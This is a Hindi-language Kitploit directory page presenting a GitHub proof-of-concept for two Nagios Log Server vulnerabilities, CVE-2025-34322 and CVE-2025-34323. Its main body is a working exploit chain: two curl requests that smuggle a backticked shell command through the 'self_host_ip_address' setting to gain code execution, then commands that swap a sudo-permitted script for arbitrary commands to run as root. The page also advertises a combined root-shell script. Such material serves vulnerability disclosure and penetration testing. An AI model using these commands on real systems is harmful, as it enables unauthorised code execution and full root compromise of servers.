Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server — CVE-2025-34322 और CVE-2025-34323 के लिए Nagios Log Server में प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट्स | Kitploit
उपकरण/GitHubGitHub/mcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubmcorybillington/cve-2025-34322_cve-2025-34323_nagios_log_server

CVE-2025-34322_CVE-2025-34323_Nagios_Log_Server

CVE-2025-34322 और CVE-2025-34323 के लिए Nagios Log Server में प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट्स

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
29 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2025-34322 और CVE-2025-34323 Nagios Log Server

CVE-2025-34322 और CVE-2025-34323 के लिए Nagios Log Server में प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, साथ ही रूट के रूप में शेल प्राप्त करने के लिए एक संयुक्त स्क्रिप्ट।

CVE-2025-34322

प्रमाणीकरण के बाद, अपने सत्र आईडी को इन दो curl कमांड में बदलें। पहला कमांड निष्पादित करने के लिए कमांड सेट करता है, दूसरा कमांड निष्पादित करेगा:

root@kitploit:~
$ curl -s -H 'Cookie: csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d; ls_session=<your-session-id>' --data 'csrf_ls=8f053ed2cb80988cea42d3ae3fc4415d&natural_language_query=1&nlp_disclaimer=on&ai_provider=self_hosted&self_host_ip_address=`touch /tmp/rce`&ai_port=8000&saveglobals=1' http://192.168.122.198/nagioslogserver/admin/globals
$ curl -s -H 'Cookie: ls_session=<your-session-id>' http://192.168.122.198/nagioslogserver/dashboard/natural_language_to_query

CVE-2025-34323

www-data उपयोगकर्ता के पास root के रूप में निम्नलिखित स्क्रिप्ट चलाने के लिए अधिकार हैं:

sudo
root@kitploit:~
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/profile.sh
(root) NOPASSWD: /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh

और /usr/local/nagioslogserver/scripts निर्देशिका लिखने योग्य है

root@kitploit:~
www-data@debian-nagios-logserver2:/usr/local/nagioslogserver$ ls -lah
total 44K
drwxrwxr-x 11 nagios nagios   4.0K Sep  7 16:34 .
drwxr-xr-x 12 root   root     4.0K Sep  7 16:29 ..
drwxrwxr-x  4 nagios nagios   4.0K Sep  7 16:20 etc
-rw-r--r--  1 root   root        0 Sep  7 16:34 .installed
drwxr-xr-x 14 nagios nagios   4.0K Sep  7 16:29 logstash
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:20 mibs
drwxr-xr-x 12 nagios nagios   4.0K Sep  7 16:20 opensearch
drwxrwxr-x  5 nagios nagios   4.0K Sep  7 16:20 pythonvenv
drwxrwxr-x  3 nagios nagios   4.0K Sep  7 16:20 scripts
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:36 snapshots
drwxrwxr-x  3 nagios www-data 4.0K Sep  7 16:36 tmp
drwxrwxr-x  2 nagios nagios   4.0K Sep  7 16:31 var

क्योंकि www-data उपयोगकर्ता nagios समूह का सदस्य है। इसलिए, www-data उपयोगकर्ता स्वामित्व की परवाह किए बिना निर्देशिका के भीतर किसी भी फ़ाइल को स्थानांतरित कर सकता है। निम्नलिखित कमांड एक फ़ाइल (reconfigure_ncpa.sh) को स्थानांतरित करेंगे जिसे www-data उपयोगकर्ता sudo अधिकारों के साथ निष्पादित कर सकता है, और फिर फ़ाइल को एक नई फ़ाइल से बदल देगा जिसमें मनमाने कमांड होंगे:

root@kitploit:~
mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '<command>' > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
टूल डाउनलोड करें